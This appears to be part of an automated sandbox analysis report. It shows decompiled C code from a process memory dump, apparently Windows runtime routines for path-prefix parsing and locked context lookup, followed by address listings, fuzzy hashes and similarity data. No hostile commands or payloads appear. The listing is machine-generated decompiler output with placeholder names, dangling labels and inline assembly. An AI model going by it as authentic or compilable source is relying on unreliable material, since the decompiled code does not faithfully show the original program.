				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x2a4d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0298F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E02976E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L02974620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E02976E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M029745F8))) {
												case 0:
													_v568 = 0x2931078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x29311c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L02974620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0299F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0299F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E029552A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0296EB70(1, 0x2a479a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0296AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E029995D0();
																			L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0299B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E02993D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0299B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x02974128
0x02974135
0x0297413c
0x02974141
0x02974145
0x02974147
0x0297414e
0x02974151
0x02974159
0x0297415c
0x02974160
0x02974164
0x02974168
0x0297416c
0x0297417f
0x02974181
0x0297446a
0x0297446a
0x0297418c
0x02974195
0x02974199
0x02974432
0x02974439
0x0297443d
0x02974442
0x02974447
0x00000000
0x0297419f
0x029741a3
0x029741b1
0x029741b9
0x029741bd
0x029745db
0x029745db
0x00000000
0x029741c3
0x029741c3
0x029741ce
0x029741d4
0x029be138
0x029be13e
0x029be169
0x029be16d
0x029be19e
0x029be16f
0x029be16f
0x029be175
0x029be179
0x029be18f
0x029be193
0x00000000
0x029be199
0x00000000
0x029be199
0x029be193
0x00000000
0x00000000
0x00000000
0x029741da
0x029741da
0x029741df
0x029741e4
0x029741ec
0x02974203
0x02974207
0x029be1fd
0x02974222
0x02974226
0x029be1f3
0x029be1f3
0x0297422c
0x0297422c
0x02974233
0x029be1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02974239
0x02974239
0x02974239
0x02974239
0x02974233
0x02974226
0x029741ee
0x029741ee
0x029741f4
0x02974575
0x029be1b1
0x029be1b1
0x00000000
0x0297457b
0x0297457b
0x02974582
0x029be1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x02974588
0x02974588
0x0297458c
0x029be1c4
0x029be1c4
0x00000000
0x02974592
0x02974592
0x02974599
0x029be1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0297459f
0x0297459f
0x029745a3
0x029be1d7
0x029be1e4
0x00000000
0x029745a9
0x029745a9
0x029745b0
0x029be1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x029745b6
0x029745b6
0x029745b6
0x00000000
0x029745b6
0x029745b0
0x029745a3
0x02974599
0x0297458c
0x02974582
0x00000000
0x00000000
0x00000000
0x00000000
0x029741f4
0x0297423e
0x02974241
0x029745c0
0x029745c4
0x00000000
0x029745ca
0x029745ca
0x00000000
0x029be207
0x029be20f
0x00000000
0x00000000
0x00000000
0x00000000
0x029745d1
0x00000000
0x00000000
0x029745ca
0x00000000
0x02974247
0x02974247
0x02974247
0x02974249
0x02974249
0x02974249
0x02974251
0x02974251
0x02974257
0x0297425f
0x0297426e
0x02974270
0x0297427a
0x029be219
0x029be219
0x02974280
0x02974282
0x02974456
0x029745ea
0x00000000
0x029745f0
0x029be223
0x00000000
0x029be223
0x0297445c
0x0297445c
0x00000000
0x0297445c
0x00000000
0x02974288
0x0297428c
0x029be298
0x02974292
0x02974292
0x0297429e
0x029742a3
0x029742a7
0x029742ac
0x029be22d
0x029742b2
0x029742b2
0x029742b9
0x029742bc
0x029742c2
0x029742ca
0x029742cd
0x029742cd
0x029742d4
0x0297433f
0x0297433f
0x029742d6
0x029742d6
0x029742d9
0x029742dd
0x029742eb
0x029be23a
0x029742f1
0x02974305
0x0297430d
0x02974315
0x02974318
0x0297431f
0x02974322
0x0297432e
0x0297433b
0x0297433b
0x00000000
0x0297432e
0x029742eb
0x0297434c
0x0297434e
0x02974352
0x02974359
0x0297435e
0x02974361
0x0297436e
0x0297438a
0x0297438e
0x02974396
0x0297439e
0x029743a1
0x029743ad
0x029743bb
0x029743bb
0x029743ad
0x0297436e
0x029743bf
0x029743c5
0x02974463
0x02974463
0x029743ce
0x029743d5
0x029743d9
0x029743df
0x02974475
0x02974479
0x02974491
0x02974491
0x02974479
0x029743e5
0x029743eb
0x029743f4
0x029743f6
0x029743f9
0x029743fc
0x029743ff
0x029744e8
0x029744ed
0x029744f3
0x029be247
0x00000000
0x029744f9
0x02974504
0x02974508
0x0297450f
0x029be269
0x00000000
0x02974515
0x02974519
0x02974531
0x02974534
0x02974537
0x0297453e
0x02974541
0x0297454a
0x029be255
0x029be255
0x029be25b
0x029be25e
0x029be261
0x029be261
0x02974555
0x02974559
0x0297455d
0x029be26d
0x029be270
0x029be274
0x029be27a
0x029be27d
0x029be28e
0x029be28e
0x02974563
0x02974563
0x02974569
0x02974569
0x00000000
0x0297455d
0x0297450f
0x00000000
0x029744f3
0x029743ff
0x02974405
0x02974405
0x02974405
0x029742ac
0x0297428c
0x02974282
0x02974407
0x0297440d
0x029be2af
0x029be2af
0x02974413
0x02974413
0x00000000
0x029741d4
0x00000000
0x029741c3
0x029741bd
0x02974415
0x02974415
0x02974416
0x02974417
0x02974429
0x0297416e
0x0297416e
0x02974175
0x02974498
0x0297449f
0x029be12d
0x00000000
0x029be133
0x00000000
0x029be133
0x029744a5
0x029744a5
0x029744aa
0x00000000
0x029744bb
0x029744ca
0x029744d6
0x029744d7
0x029744d8
0x029744e3
0x029744e3
0x029744aa
0x0297417b
0x0297417b
0x0297417b
0x00000000
0x0297417b
0x02974175
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6966213552c6d89774c6ba107d2fce712cf94eb29b5848b0c61707ae5ae8b1b
Instruction ID: e2b6853bb306df0c87a5cbb249118bb4dfd336701f4cd7d54c3d190658aeff08
Opcode Fuzzy Hash: f6966213552c6d89774c6ba107d2fce712cf94eb29b5848b0c61707ae5ae8b1b
Instruction Fuzzy Hash: FCF19C706082118FC725CF19C580A7AB7FAFF88718F55592EF88ACB291E734D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 029820A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E029820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x2a48714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E02982EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E02982EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E029558EC(_t240);
									_t221 =  *0x2a45cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x2a45cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E02994A2C(0x2a46e40, 0x2994b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E02977D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x2935c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0298F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0298F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E029D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L02972400(_t267 + 0x20);
															}
															L02972400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E02982397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E02972280(_t134, 0x2a48608);
									__eflags =  *0x2a46e48 - _t253; // 0xaafb88
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0296FFB0(_t198, _t241, 0x2a48608);
										__eflags = _t253;
										if(_t253 != 0) {
											L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x2a46e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x2a48608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E02986B90(_t210,  &_v64);
										_t262 =  *0x2a48608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0298E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E029997C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0299006A(0x2a48608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x2a48608);
												E0299B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x2a46904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x2a46e48; // 0xaafb88
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0296FFB0(_t198, _t240, 0x2a48608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E029900C2(0x2a48608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x029820a0
0x029820a8
0x029820ad
0x029820b3
0x029820b8
0x029820c2
0x029820c7
0x029820cb
0x029820d2
0x02982263
0x02982266
0x029c5836
0x029c5836
0x00000000
0x0298226c
0x0298226c
0x02982270
0x02982274
0x029820e2
0x029820e2
0x029820e6
0x029820ee
0x029c57dc
0x029c57de
0x029c57ec
0x029c57ec
0x029c57f1
0x029c57f3
0x029c57f8
0x00000000
0x029c57f8
0x029c57e0
0x029c57e4
0x029c57ea
0x00000000
0x00000000
0x00000000
0x029c57ea
0x029820f4
0x029820f4
0x029820f8
0x029820f8
0x029820fc
0x02982100
0x02982106
0x02982201
0x02982206
0x0298220b
0x0298220e
0x029822a9
0x029822ac
0x00000000
0x00000000
0x029822b2
0x029822b5
0x029c5801
0x029c5806
0x00000000
0x00000000
0x029c5810
0x029c5815
0x029c5818
0x00000000
0x00000000
0x029c581e
0x029822bb
0x029822bb
0x02982218
0x02982218
0x0298221c
0x02982220
0x02982222
0x029822c2
0x029822c4
0x029822dc
0x029822dc
0x029822e1
0x00000000
0x00000000
0x00000000
0x029822e7
0x029822c8
0x029822cd
0x029822d3
0x029822d6
0x029c5823
0x029c5825
0x029c5827
0x00000000
0x00000000
0x029c582d
0x00000000
0x029c582d
0x00000000
0x02982228
0x02982228
0x00000000
0x02982228
0x02982222
0x02982214
0x02982214
0x00000000
0x02982114
0x02982114
0x02982114
0x0298211a
0x0298211c
0x02982348
0x0298234d
0x029c5840
0x029c5845
0x029c5848
0x029c584e
0x029c584e
0x029c5848
0x02982353
0x02982355
0x02982388
0x02982388
0x02982368
0x0298236a
0x0298236c
0x0298238f
0x00000000
0x0298236e
0x0298236e
0x0298218e
0x0298218e
0x02982191
0x02982195
0x029c5a03
0x029c5a06
0x029c5a0c
0x029c5a0f
0x029c5a11
0x029c5a13
0x029c5a13
0x029c5a19
0x029c5a1f
0x00000000
0x0298219b
0x0298219b
0x029821a0
0x02982282
0x02982284
0x02982284
0x02982284
0x02982284
0x029821a6
0x029821a9
0x029821ac
0x029821ae
0x029821b3
0x0298228b
0x02982290
0x02982379
0x02982296
0x02982298
0x02982298
0x02982290
0x029821b9
0x029821be
0x029822a2
0x029822a2
0x029821c4
0x029821c8
0x029821cc
0x029821d0
0x029821d4
0x029821de
0x029821e3
0x029c5a29
0x029c5a2c
0x00000000
0x00000000
0x029c5a3b
0x00000000
0x029821e9
0x029821e9
0x029821e9
0x029821ee
0x029821f1
0x029c5a45
0x029c5a4b
0x029c5a52
0x029c5a58
0x029c5a5d
0x029c5a5f
0x029c5a71
0x029c5a61
0x029c5a6a
0x029c5a6a
0x029c5a76
0x029c5a79
0x029c5a7f
0x029c5a83
0x029c5a85
0x029c5a87
0x029c5a87
0x029c5a8c
